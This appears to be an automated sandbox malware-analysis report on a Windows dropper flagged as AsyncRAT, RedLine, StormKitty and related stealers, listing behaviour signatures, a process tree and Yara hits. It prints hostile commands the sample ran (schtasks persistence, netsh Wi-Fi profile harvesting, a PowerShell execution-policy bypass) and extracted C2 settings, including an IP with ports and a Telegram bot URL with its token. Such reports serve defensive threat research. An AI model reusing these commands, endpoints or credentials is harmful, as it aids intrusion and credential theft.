Edit tour

Windows Analysis Report
xj40xovMsm.exe

Overview

General Information

Sample name:	xj40xovMsm.exe renamed because original name is a hash value
Original sample name:	1082572a44d4c41214a3c38dcd8289f9.exe
Analysis ID:	1468518
MD5:	1082572a44d4c41214a3c38dcd8289f9
SHA1:	d1e83fbdc0bfaa92334eb043e3f37bbe1104cd68
SHA256:	9085e6327177bb47cf43a8d8ed0c24fcfd50cde4199c5130f2b97b2508e9aabc
Tags:	AsyncRATexeRAT
Infos:

Detection

AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AsyncRAT

Yara detected AveMaria stealer

Yara detected Keyzetsu Clipper

Yara detected MicroClip

Yara detected PureLog Stealer

Yara detected RL STEALER

Yara detected RedLine Stealer

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected VenomRAT

Yara detected WorldWind Stealer

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Changes memory attributes in foreign processes to executable or writable

Connects to a pastebin service (likely for C&C)

Contains functionality to capture screen (.Net source)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Creates multiple autostart registry keys

Drops PE files with benign system names

Drops executable to a common third party application directory

Found many strings related to Crypto-Wallets (likely being stolen)

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies existing user documents (likely ransomware behavior)

Modifies the context of a thread in another process (thread injection)

Modifies the hosts file

Modifies the prolog of user mode functions (user mode inline hooks)

Overwrites Mozilla Firefox settings

Performs DNS queries to domains with low reputation

Protects its processes via BreakOnTermination flag

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file overlay found

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious desktop.ini Action

Sigma detected: Uncommon Svchost Parent Process

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

xj40xovMsm.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\xj40xovMsm.exe" MD5: 1082572A44D4C41214A3C38DCD8289F9)

relog.exe (PID: 7152 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

3CBD.tmp.Installer.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe" MD5: BED8CDCED2D57BE2BD750F0F59991ECD)

schtasks.exe (PID: 2180 cmdline: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

accc.exe (PID: 7324 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: BED8CDCED2D57BE2BD750F0F59991ECD)

cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7424 cmdline: timeout 7 MD5: 100065E21CFBBDE57CBA2838921F84D6)

4336.tmp.Server.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe" MD5: 68FAD5F5F8DE1C290DF5D3754B4AF358)

cmd.exe (PID: 6348 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6656 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 3736 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7544 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5356 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1340 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 5300 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

476D.tmp.Server.exe (PID: 420 cmdline: "C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe" MD5: 68FAD5F5F8DE1C290DF5D3754B4AF358)

cmd.exe (PID: 7020 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3896 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 4624 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7396 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5296 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3696 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 8000 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

4BC4.tmp.Client.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe" MD5: 43F955115DFBA87CA3593A18EFD58CEF)

5087.tmp.update.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe" MD5: C709136E78750FEB6CB85F99EDA16629)

cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7908 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

svchost.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C709136E78750FEB6CB85F99EDA16629)

cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7468 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

jqnnpe.exe (PID: 5184 cmdline: "C:\Users\user\AppData\Local\Temp\jqnnpe.exe" MD5: C28490DA01887AA59D82C54B576DC107)

53A5.tmp.update.exe (PID: 7508 cmdline: "C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe" MD5: C709136E78750FEB6CB85F99EDA16629)

5E16.tmp.aaa.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe" MD5: E52BA92D25281E90AA7F27BD3719951F)

62AB.tmp.build.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe" MD5: 7081E613321921500B70899FDDB56A4D)

xj40xovMsm.exe (PID: 7208 cmdline: "C:\Users\user\Desktop\xj40xovMsm.exe" MD5: 1082572A44D4C41214A3C38DCD8289F9)

relog.exe (PID: 7536 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)

accc.exe (PID: 6896 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: BED8CDCED2D57BE2BD750F0F59991ECD)

svchost.exe (PID: 796 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C709136E78750FEB6CB85F99EDA16629)

Service_{B955B2CC07A01546086603}.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe" MD5: 839B3EFD5782B6FC122855665F3AA202)

relog.exe (PID: 7032 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)

Service_{B955B2CC07A01546086603}.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe" MD5: 839B3EFD5782B6FC122855665F3AA202)

relog.exe (PID: 4916 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)

svchost.exe (PID: 3244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Ave Maria, AveMariaRAT, avemaria	Information stealer which uses AutoIT for wrapping.	Anunak	http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery https://asec.ahnlab.com/en/36629/ https://blog.cyber5w.com/analyzing-macro-enabled-office-documents https://blog.morphisec.com/syk-crypter-discord https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: VenomRAT

{"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendMessage"}

Threatname: AsyncRAT

{"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}

Threatname: RedLine

{"C2 url": ["{\"result\":200"], "Bot Id": "\"lat\":"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x243076:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2536b7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x26a5b9:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x149460:$a2: Stub.exe 0x14950a:$a2: Stub.exe 0x244649:$a2: Stub.exe 0x2446d9:$a2: Stub.exe 0x2560c1:$a2: Stub.exe 0x256151:$a2: Stub.exe 0x189bef:$a3: get_ActivatePong 0x1bc000:$a3: get_ActivatePong 0x23f839:$a3: get_ActivatePong 0x24e552:$a3: get_ActivatePong 0x194396:$a4: vmware 0x1c67a7:$a4: vmware 0x243320:$a4: vmware 0x253915:$a4: vmware 0x1946f6:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1c6a6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x253747:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x189b14:$a6: get_SslClient
dump.pcap	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x19068b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x1c2a9c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2d5ffa:$x1: AsyncRAT 0x2d6038:$x1: AsyncRAT 0x149460:$s4: Stub.exe 0x14950a:$s4: Stub.exe 0x21e890:$s4: Stub.exe 0x244649:$s4: Stub.exe 0x2446d9:$s4: Stub.exe 0x2560c1:$s4: Stub.exe 0x256151:$s4: Stub.exe 0x188b6d:$s6: VirtualBox 0x1943a4:$s6: VirtualBox 0x1baf7e:$s6: VirtualBox 0x1c67b5:$s6: VirtualBox 0x24332e:$s6: VirtualBox 0x253923:$s6: VirtualBox 0x18e273:$s8: Win32_ComputerSystem 0x19430a:$s8: Win32_ComputerSystem 0x1c0638:$s8: Win32_ComputerSystem 0x1c671b:$s8: Win32_ComputerSystem 0x22f4e0:$s8: Win32_ComputerSystem 0x243294:$s8: Win32_ComputerSystem

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\svchost.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Roaming\svchost.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\svchost.exe	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb638:$a2: Stub.exe 0xb6c8:$a2: Stub.exe 0x6ee8:$a3: get_ActivatePong 0xa473:$a4: vmware 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7c89:$a6: get_SslClient
C:\Users\user\AppData\Roaming\svchost.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa2ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb638:$a2: Stub.exe 0xb6c8:$a2: Stub.exe 0x6ee8:$a3: get_ActivatePong 0xa473:$a4: vmware 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7c89:$a6: get_SslClient
C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa2ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3a02a:$s2: ReflectiveLoader@
C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd118:$q1: Select * from Win32_CacheMemory 0xd158:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd1a6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd1f4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb638:$a2: Stub.exe 0xb6c8:$a2: Stub.exe 0x6ee8:$a3: get_ActivatePong 0xa473:$a4: vmware 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7c89:$a6: get_SslClient
C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa2ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x476af:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a6f2:$s1: \VPN\NordVPN 0x4a796:$s1: \VPN\NordVPN 0x4a856:$s2: \VPN\OpenVPN 0x4a8c4:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49ae9:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b554:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b786:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\jqnnpe.exe	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x47500:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4abc2:$s11: \Ethereum\keystore 0x45bfd:$v1_5: sharedSecret 0x487f7:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
